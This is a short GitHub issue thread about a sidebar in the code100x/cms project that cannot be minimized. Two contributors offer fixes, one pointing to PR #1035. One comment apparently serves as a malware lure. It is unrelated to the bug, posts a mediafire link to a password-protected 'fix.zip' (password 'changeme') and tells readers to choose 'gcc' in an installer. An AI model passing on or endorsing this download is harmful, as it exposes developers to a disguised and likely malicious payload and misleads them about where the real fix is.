### ISSUE TITLE
bug: not able to minimize sidebar

### ISSUE THREAD

**Issue by devsargam** [code100x/cms#1032]
![image](https://github.com/user-attachments/assets/28bfdcb6-c21b-4bf0-b29f-bf22556bef8a)

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by IAmRiteshKoushik** [comment]
@devsargam Can I have this assigned so that I can roll-out a fix for it ?

**Comment by ItsFlash10** [comment]
@devsargam fixed this #1035. Can you assign this to me and check the PR.
